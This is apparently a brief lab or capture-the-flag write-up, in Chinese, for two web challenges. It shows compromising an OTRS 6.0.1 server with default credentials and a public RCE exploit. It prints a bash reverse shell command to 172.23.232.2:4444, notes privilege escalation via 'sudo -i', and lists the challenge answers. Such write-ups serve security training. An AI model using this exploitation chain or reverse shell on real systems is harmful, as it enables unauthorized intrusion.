# Web Range-119-120 ## Challenge 119 ## Challenge 120   * ip連上後是ubuntu預設頁面, 掃完發現robots.txt跟一個 `otrs` *  * 會被導到一個CMS的頁面, `otrs 6.0.1` *  *  * 有RCE *  * 似乎要先找到credential *  * 猜到帳密了, 基本是預設的 *  * `root@localhost:password` * Run script後發現連不回來, 仔細看了PoC steps發現路徑稍微不同, 要點進去改 * https://www.exploit-db.com/exploits/43853 *  * PGP路徑改成python, 要拿來reverse shell *  * Command 塞在Option *  * python一直找不到正確路徑, 改用bash *  ```zsh= -c 'exec bash -i >& /dev/tcp/172.23.232.2/4444 0>&1' ``` * 修改完後訪問 `?Action=AdminPGP` Got shell as `www-data` *  *  * `sudo -i`直接提= = *  ## Answer * Challenge 119:`password` * Challenge 120:`fb53552b`
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up